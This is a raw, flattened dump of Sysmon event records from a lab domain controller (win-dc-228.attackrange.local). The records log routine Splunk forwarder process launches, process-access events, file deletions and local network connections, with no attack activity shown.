13:58:02.963{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E76A-6040-FC4D-00000000AD01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201298Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.963{5ABCFE62-E76A-6040-FC4D-00000000AD01}6808C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201297Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.963{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=485742D1120E0BA552A9E5B45A95DCAF,SHA256=51D6EA22B95F606AA47A0521E79EDF931428476FF57C4E9868D347C36389286D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201296Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.291{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E76A-6040-FB4D-00000000AD01}1612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201295Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.291{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201294Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.291{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201293Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.291{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201292Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.291{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201291Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.291{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E76A-6040-FB4D-00000000AD01}1612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201290Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.291{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E76A-6040-FB4D-00000000AD01}1612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201289Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.291{5ABCFE62-E76A-6040-FB4D-00000000AD01}1612C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201288Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.228{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3078105837F9A16722AA5B04D5F62C92,SHA256=5D2B73E3071E85D7115B580E6899DE5257853B2B46EE8C5894E67CEBA78038AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201317Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.963{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=713C82C0B6FBFD72F0C58AD761EA667B,SHA256=193F2CA9FD64F618B22B7574DD7766D1A71A872A4357CBCD5CE3A8245A34D32B,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002201316Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.588{5ABCFE62-E76B-6040-FD4D-00000000AD01}61565920C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201315Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.463{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E76B-6040-FD4D-00000000AD01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201314Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.463{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201313Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.463{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201312Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.463{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201311Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.463{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201310Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.463{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E76B-6040-FD4D-00000000AD01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201309Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.463{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E76B-6040-FD4D-00000000AD01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201308Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.464{5ABCFE62-E76B-6040-FD4D-00000000AD01}6156C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002201307Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:03.416{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=1736F86543555CF83720F40B960ED45D,SHA256=CCDA5218ACEBB573B507708095401043436EB348C2CE301A27B7515606466785,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201306Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:57:59.065{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55202-false10.0.1.12-8000- 23542300x80000000000000002201319Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:04.994{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=415A7F6D28D84779A78C0052430D658D,SHA256=8E8E1668FB78069601F70A5523F4925125F9D37CBAEDB6983AE01160F5659ECE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201318Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:04.697{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F50CDC0AA83FD7D5F21CCD578A481F1E,SHA256=3B63D18B1B1EA020409521F93BCB8F772BC439D10343DD21243215798B7EBFBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201322Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:05.995{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1373F4B0C16C7D641E2A0788FFA3DF8A,SHA256=E4E10BA13C868770717D1CE701F400952D763A44F20C9A66E65F62F56550D817,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201321Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:05.792{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=89D7DE9D999955E9D0CE425CCCCD6FAF,SHA256=F355AAEDF9166995B13AAE668DF812D0277F7ED295006DE3987F181143BDEA35,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201320Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:01.627{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local56008- 23542300x80000000000000002201323Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:06.792{5ABCFE62-84A2-603E-A500-00000000AD01}2876NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=78FFC68B55788172C6F01776E1175A4A,SHA256=7EFF8D2B790A6CE455B9D8C44CE8A2AF78181139506EC2EC15800E71AC1D548F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201326Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:07.448{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FF69BB002607AA833FCC4C4CADBE226E,SHA256=5E7E6A78A86EA47FB605199088FBE67551ACC20966545FBD4EE354D9FC4BDF84,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201325Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:02.626{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-56008- 23542300x80000000000000002201324Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:07.026{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5407710CD75CD5477D84BB0F5A478B8C,SHA256=776933F3EC9A74138A40C985B018E5982A1373505375475D14D26A1208861B82,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201329Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:04.613{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55204-false10.0.1.12-8089- 354300x80000000000000002201328Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:04.097{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55203-false10.0.1.12-8000- 23542300x80000000000000002201327Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:08.039{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D1A166CC288528759FBB861B48124339,SHA256=FB14CB6C96C1156A9124F78E0766DFDCDF54E83877021C948AB35AF6651FC40D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201330Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:58:09.070{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DAAA5A32DDDFA88EB5AC6BAE7B5BB3EB,SHA256=FD4EA022E1FE0FBC43B6E7F8A6E695B3104229951CBDB378BC1DC64F0C590BC0,IMPHASH=00000000000000000000000000000000falsetrue 